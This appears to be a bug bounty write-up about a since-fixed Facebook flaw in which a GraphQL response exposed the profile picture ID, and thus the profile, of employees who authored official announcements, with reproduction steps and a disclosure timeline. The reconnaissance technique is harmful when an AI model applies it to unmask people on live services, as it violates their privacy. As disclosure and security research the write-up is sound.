Disclose the FB profile of Facebook employees who create official announcement messages (Bug Bounty)
The vulnerability could have let a malicious user reveal the profile picture and FB profile of Facebook employees who create official announcement messages (supposed to be displayed to users as coming from Facebook).
Everything started when I received a notification regarding a Facebook Bug Bounty Program Announcement.
By checking the HTTP History on Blurp, I noticed that a GraphQL request was trigged while browsing the announcement page.
By analyzing the response of this request, I found a value named “creator_profile_pic_uri” that was returning an URL with a picture ID:
I copied the picture ID present on the link and insert it on the following URL: https://www.facebook.com/photo?fbid=X
The profile picture and FB profile of the Facebook employee who created the announcement was displayed.
1) Send a POST request to https://www.facebook.com/api/graphql/ with CSRF parameters and the following parameters in the request body:
(Where X is the ID of the Facebook announcement message)
2) Search for “creator_profile_pic_uri” on the returned GraphQL response
3) Grab the picture ID from creator_profile_pic_uri’ and insert it on the following URL: https://www.facebook.com/photo?fbid=Y (Where Y is the picture ID)
January 8, 2021: Reported
January 8, 2021: Acknowledged by Facebook
January 14, 2021: Fixed by Facebook
February 1, 2021: $XXXX Bounty awarded by Facebook.